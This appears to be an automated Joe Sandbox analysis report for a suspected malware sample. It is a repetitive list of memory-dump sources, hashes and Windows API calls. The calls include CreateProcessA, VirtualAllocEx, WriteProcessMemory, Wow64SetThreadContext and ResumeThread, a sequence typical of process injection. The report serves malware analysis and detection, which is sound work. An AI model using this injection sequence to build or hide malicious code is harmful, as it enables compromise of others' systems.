                                                                        • Instruction ID: 7129ba11af77b20525c1257e25cd7cdf8bda883732868b485fe1140b48fb87ae
                                                                        • Opcode Fuzzy Hash: 620fa7c79930c8886174b663be9f8c30aca50cfa76aaa45e1c4d0b0f5cf51a5a
                                                                        • Instruction Fuzzy Hash: 25313AB8D1A20CCBDB04CFA6E5483EDBBFAAFAE314F04A025D809E7241DB744546CE10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f486b8367d0923aaed10a591a73b66883d533ebaa0b15c55eb97eda4ca85802d
                                                                        • Instruction ID: 4e0e8ccf5882eadfcd17280a0ddded2d3d7e49913eecb7aa8632f945d3f0a0b8
                                                                        • Opcode Fuzzy Hash: f486b8367d0923aaed10a591a73b66883d533ebaa0b15c55eb97eda4ca85802d
                                                                        • Instruction Fuzzy Hash: 0CE0B6B9D6919CCBCB00DF98E4455F8BBF8AB9B225F0020A69C0DE3211DA3199958E15

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D07E
                                                                        • GetCurrentThread.KERNEL32 ref: 0150D0BB
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D0F8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0150D151
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID: {s#
                                                                        • API String ID: 2063062207-3582909824
                                                                        • Opcode ID: 8e38488db9a200eeb4498fde71f4085e2640eb30ee2aa6974a5aa78389f944ee
                                                                        • Instruction ID: efaed2957cdaafd0bf4ec381f3716d75842b1ccff499e6afba97c09d17dde4f4
                                                                        • Opcode Fuzzy Hash: 8e38488db9a200eeb4498fde71f4085e2640eb30ee2aa6974a5aa78389f944ee
                                                                        • Instruction Fuzzy Hash: 985168B0900649CFDB15CFEACA48B9EBBF1FF48314F248859E409AB390D7345985CB65

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D07E
                                                                        • GetCurrentThread.KERNEL32 ref: 0150D0BB
                                                                        • GetCurrentProcess.KERNEL32 ref: 0150D0F8
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0150D151
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID: {s#
                                                                        • API String ID: 2063062207-3582909824
                                                                        • Opcode ID: 07e654002976fc63505ff159fc993bbf0cd5d9f93feb5accbb688f41fe6ebf89
                                                                        • Instruction ID: c7c9c40cc24a2564a5a78258457acf6980422f3a83a05623906d19e59f345b46
                                                                        • Opcode Fuzzy Hash: 07e654002976fc63505ff159fc993bbf0cd5d9f93feb5accbb688f41fe6ebf89
                                                                        • Instruction Fuzzy Hash: EA5168B0900649CFDB15CFEACA48B9EBBF1FF88314F248459E419AB390D7345985CB65

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078513A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: {s#${s#
                                                                        • API String ID: 963392458-4214758537
                                                                        • Opcode ID: 3ad53533fde9c95032ba8933d609d47e3746840ed85ec4578c7310262da5fa36
                                                                        • Instruction ID: e19b73f5e9f3da37d95bb228cd155a937db1babfd5c19f0c2ac44dec71cd26ce
                                                                        • Opcode Fuzzy Hash: 3ad53533fde9c95032ba8933d609d47e3746840ed85ec4578c7310262da5fa36
                                                                        • Instruction Fuzzy Hash: 7DA149B1D0065ACFDF14DFA8C845BEDBBB2BB58310F1485A9E808E7280DB749985CF91

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078513A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID: {s#${s#
                                                                        • API String ID: 963392458-4214758537
                                                                        • Opcode ID: 56246ea1f43043cb3da633cd9d54787065e10fccbb73f779214eb9286c0b311b
                                                                        • Instruction ID: 7b57334dbcc0003667839ca3ef3a4fdf8a3a24d6afe5c6694b1d12af7d549973
                                                                        • Opcode Fuzzy Hash: 56246ea1f43043cb3da633cd9d54787065e10fccbb73f779214eb9286c0b311b
                                                                        • Instruction Fuzzy Hash: B19138B1D0065ACFDF14CFA8C845BADBAB2BB58314F1485A9E808E7280DB749985CF91

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0150AFBE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID: {s#
                                                                        • API String ID: 4139908857-3582909824
                                                                        • Opcode ID: ff9f9aee07aa67178459edb5986457d589b32028ac48c2f068a77b08f27cb011
                                                                        • Instruction ID: d4704b17f00a81e85a7df64c175dc47a24390c6bcde3ce05ae846f3d702f5f50
                                                                        • Opcode Fuzzy Hash: ff9f9aee07aa67178459edb5986457d589b32028ac48c2f068a77b08f27cb011
                                                                        • Instruction Fuzzy Hash: 607116B0A00B458FD726DFA9D05075ABBF1BF88304F108A2DD446DBB90D775E949CB90

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 015059C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID: {s#
                                                                        • API String ID: 2289755597-3582909824
                                                                        • Opcode ID: 5ca6aa330140ebda8a9d48b4804d9d15675d2c076b3ab42ee032f2563acbf021
                                                                        • Instruction ID: 066c6a6d8f759298b2aae010473428c5bd86ef2ccacb830a2232b44b6d39feb9
                                                                        • Opcode Fuzzy Hash: 5ca6aa330140ebda8a9d48b4804d9d15675d2c076b3ab42ee032f2563acbf021
                                                                        • Instruction Fuzzy Hash: B841F2B0C00719CBDB25DFAAC885BCEBBF5BF49304F20845AD408AB251EB756946CF90

                                                                        Control-flow Graph (rendered graph; edge list not reproduced)
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 015059C9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID: {s#
                                                                        • API String ID: 2289755597-3582909824

Control-flow Graph
• 9 basic blocks spanning 7850ee0-7850fbe; WriteProcessMemory is called in block 7850f6a-7850f85 (graph rendering omitted)
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07850F78
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID: {s#
• API String ID: 3559483778-3582909824

Control-flow Graph
• 7 basic blocks spanning 7850ee8-7850fbe; WriteProcessMemory is called in block 7850f6a-7850f85 (graph rendering omitted)
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07850F78
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID: {s#
• API String ID: 3559483778-3582909824

Control-flow Graph
• 3 basic blocks spanning 7850fd0-785109e; ReadProcessMemory is called in block 7850fd0-7851065 (graph rendering omitted)
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07851058
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID: {s#
• API String ID: 1726664587-3582909824

Control-flow Graph
• 5 basic blocks spanning 7850d48-7850e14; Wow64SetThreadContext is called in block 7850dab-7850ddb (graph rendering omitted)
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07850DCE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID: {s#
• API String ID: 983334009-3582909824

Control-flow Graph
• 3 basic blocks spanning 150d648-150d70a; DuplicateHandle is called in block 150d648-150d6e4 (graph rendering omitted)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150D6D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: {s#
• API String ID: 3793708945-3582909824

APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07851058
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID: {s#
• API String ID: 1726664587-3582909824

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07850DCE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID: {s#
• API String ID: 983334009-3582909824

APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0150D6D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: {s#
• API String ID: 3793708945-3582909824

APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07850E96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: AllocVirtual
• String ID: {s#
• API String ID: 4275171209-3582909824

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ResumeThread
• String ID: {s#
• API String ID: 947044025-3582909824

APIs
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 07850E96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: AllocVirtual
• String ID: {s#
• API String ID: 4275171209-3582909824

APIs
• PostMessageW.USER32(?,?,?,?), ref: 078555CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MessagePost
• String ID: {s#
• API String ID: 410705778-3582909824

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: ResumeThread
• String ID: {s#
• API String ID: 947044025-3582909824

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0150AFBE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1713637295.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1500000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: HandleModule
• String ID: {s#
• API String ID: 4139908857-3582909824

APIs
• PostMessageW.USER32(?,?,?,?), ref: 078555CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716489529.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7850000_9758xBqgE1azKnB.jbxd
Similarity
• API ID: MessagePost
• String ID: {s#
• API String ID: 410705778-3582909824

Strings
Memory Dump Source
• Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: 2f6dec781fda3607ab3941bc89455fabaccdf609a9b2fbe568b230f41af1fce3
                                                                        • Instruction ID: dcac7eb1d03b9b115f6c8cced498898c9e2b24851e146dcfb80778d9af421a05
                                                                        • Opcode Fuzzy Hash: 2f6dec781fda3607ab3941bc89455fabaccdf609a9b2fbe568b230f41af1fce3
                                                                        • Instruction Fuzzy Hash: 43910774E042189FCB14DFA9C890AADBBF2EF89354F20856AE929E7345D7359942CF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 8849b16559b4e079659ea1c7386a1db6e1417897632b76598fd6d687d7bed70e
                                                                        • Instruction ID: 4f5f121b493da7a639d494e8b24256852ab65ebda35ab34f0ca51fe8a158083c
                                                                        • Opcode Fuzzy Hash: 8849b16559b4e079659ea1c7386a1db6e1417897632b76598fd6d687d7bed70e
                                                                        • Instruction Fuzzy Hash: 2D51AD71B002198FCB01DBB9D85497EBBF7EFC83247148A29E41ADB395EB309C068791
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: e67e5d1717b153f3c32dae6c1ba5a9d584a2f95179b610818081ed28737d9591
                                                                        • Instruction ID: 751793d8d019216d0c7aee8a3d0f0f4a0bcc58cd2d213c63e20d7d32aab35def
                                                                        • Opcode Fuzzy Hash: e67e5d1717b153f3c32dae6c1ba5a9d584a2f95179b610818081ed28737d9591
                                                                        • Instruction Fuzzy Hash: 3E41D874E0011DAFCF04EFA8D5949AEBBB2FB89304F108429E915A73A4DB359D46CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: a9aeafdba7cf9d654e50a0e29f6ec6dfbe017a0adf6ed3d6f87a30eb8602c024
                                                                        • Instruction ID: 48f12bb69687ec88e20e2babace4a4cc2343c284434e528e7d19cccba8ccac16
                                                                        • Opcode Fuzzy Hash: a9aeafdba7cf9d654e50a0e29f6ec6dfbe017a0adf6ed3d6f87a30eb8602c024
                                                                        • Instruction Fuzzy Hash: FD316AB2A002489FCF14DFA9D845A9EBFF9EF48324F14846AE509E7250D7359904CFA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8xq
                                                                        • API String ID: 0-3139237302
                                                                        • Opcode ID: ba5ea6c2c4301ff3701550f62d256c96979fdfd3ad97f754a4e57dc7b81ecc93
                                                                        • Instruction ID: 1df27eefdc2fa70de22bc329835ccff242b6d3c82377c1e85be6e8bd5747e2f5
                                                                        • Opcode Fuzzy Hash: ba5ea6c2c4301ff3701550f62d256c96979fdfd3ad97f754a4e57dc7b81ecc93
                                                                        • Instruction Fuzzy Hash: C6411A74E001099FCF05DFA8D5545AEBBB2FB89304F10846AE915E73A4DB359946CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: 9e3ae17fbb1e475d760fe6d7e4168ee8b1466e53bede2409e68910780f3a7390
                                                                        • Instruction ID: 2e6a0ddb3d98b72d41c372e6d6cd3a8edc0b496278dbb2a056f753f1f310532d
                                                                        • Opcode Fuzzy Hash: 9e3ae17fbb1e475d760fe6d7e4168ee8b1466e53bede2409e68910780f3a7390
                                                                        • Instruction Fuzzy Hash: 4E31EEB0D1125CDFDB20CF9AC598B9EBFF5AB48318F24806AE508BB240C7B55845CBA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: c13ebefc2d00faae08064dbb6b667c8b6e7476fc36acf9e4d7af27da7d7dfd01
                                                                        • Instruction ID: 1cb61191cfb8da953f040722f3d28413c7e77c44812dc8c3c27dbd6fae894986
                                                                        • Opcode Fuzzy Hash: c13ebefc2d00faae08064dbb6b667c8b6e7476fc36acf9e4d7af27da7d7dfd01
                                                                        • Instruction Fuzzy Hash: FF311FB0D11258DFDB20CF99D988B9EBFF5BB48314F24842AE408BB650C7B55845CFA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: d35ee227ad721fa3b15b316566ed3cb6f61c97c81711dfe15c9217ca4d8dd4e8
                                                                        • Instruction ID: 849539ba3e32f325c955fc1bf7a45d9f5cfed961a0950c7f2cde03ee5f0de7e6
                                                                        • Opcode Fuzzy Hash: d35ee227ad721fa3b15b316566ed3cb6f61c97c81711dfe15c9217ca4d8dd4e8
                                                                        • Instruction Fuzzy Hash: 92114FB5F0061E8BCF18EBB999106FFBBB2AB84310B504039D515E7340EB318E01CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: {s#
                                                                        • API String ID: 0-3582909824
                                                                        • Opcode ID: c2e780a0e6350371087a723ddf637b35bedfe62d955f2e1be712c0ee05e034cd
                                                                        • Instruction ID: 5ebf0b8b89798b6e63e19400fdbe70a7e59ca00af0a7a56b37c83abfc3b1c7c6
                                                                        • Opcode Fuzzy Hash: c2e780a0e6350371087a723ddf637b35bedfe62d955f2e1be712c0ee05e034cd
                                                                        • Instruction Fuzzy Hash: 432100B69042499FCB20CF9AD884ADEBBF4FB48320F10845AE919A7210C375A954CFA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 51f17fcb6ebaab134883aa59e38324b11e928630760ac757657bda0afedc3cfc
                                                                        • Instruction ID: 94c4b365eb7d0ecb938785d20e7ed3278c1171c4c8df8a0f48683afb4e441f00
                                                                        • Opcode Fuzzy Hash: 51f17fcb6ebaab134883aa59e38324b11e928630760ac757657bda0afedc3cfc
                                                                        • Instruction Fuzzy Hash: 6611C6B4E146488BDB18CFEAC5546DEFBB6AF88300F14C02AD419AB358EB7419468F90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: c5e14d29f1930b2f5073f4594b8c783159c6583b8a4b4b3d076485c26bdb2ffa
                                                                        • Instruction ID: 5e2a6e19e3a26b8538890ac3db4ae17c9b0478cd92d568f1e366577742de8e9f
                                                                        • Opcode Fuzzy Hash: c5e14d29f1930b2f5073f4594b8c783159c6583b8a4b4b3d076485c26bdb2ffa
                                                                        • Instruction Fuzzy Hash: 8611B6B4E146488BDB18CFEAC5542EEFBF6AF88304F14C02AD519AB358EB7419468F50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: 46b06edb9b5adc24f23fa3d5dbc3ff2c587cd33c61581d663947791d08f3cc23
                                                                        • Instruction ID: a58d7282134348ea9da373f74f865573b1c7e5ee6d4ce76d957421adf86d8184
                                                                        • Opcode Fuzzy Hash: 46b06edb9b5adc24f23fa3d5dbc3ff2c587cd33c61581d663947791d08f3cc23
                                                                        • Instruction Fuzzy Hash: DE116075E012199FCF05CFE8D8949ADFBB2FF89310F14816AE919AB265C7355906CF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Tetq
                                                                        • API String ID: 0-1197912954
                                                                        • Opcode ID: f3d28279215359e5870b400b62d9eea94c92f90f4eb20745776ad667422c652a
                                                                        • Instruction ID: a5c6b33ec9f8173e3bf93fae0084d961baa700f7dab846c9ae2f19ac469e0593
                                                                        • Opcode Fuzzy Hash: f3d28279215359e5870b400b62d9eea94c92f90f4eb20745776ad667422c652a
                                                                        • Instruction Fuzzy Hash: 37116C75E002199FCB08DFE8D8909ADFBB2FB88310F20812AE919AB365C7356905CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 7
                                                                        • API String ID: 0-1790921346
                                                                        • Opcode ID: e31b5d5ba037205ff0c12fab709c2e8fc6b28adaaa5cddde4abc1f8495572abb
                                                                        • Instruction ID: 7825288ee12db3ca8d5f27c3e2cf4a5e3bb593438baa4b7df6e752ed23aba861
                                                                        • Opcode Fuzzy Hash: e31b5d5ba037205ff0c12fab709c2e8fc6b28adaaa5cddde4abc1f8495572abb
                                                                        • Instruction Fuzzy Hash: EEE02B75E4510CEBCB14EFF4E4197FE7BB8AB40308F504595E506532A0D7700E46C641
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1717192252.00000000091F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_91f0000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: fe1d0f893d3d42b50d9313828849b1d20b4e23f9aec4b61bdf9a85ca9220b507
                                                                        • Instruction ID: b9c7b1a35cdc47e39082df515dc32732755d3d1b4d5a11266820a4597e1f870a
                                                                        • Opcode Fuzzy Hash: fe1d0f893d3d42b50d9313828849b1d20b4e23f9aec4b61bdf9a85ca9220b507
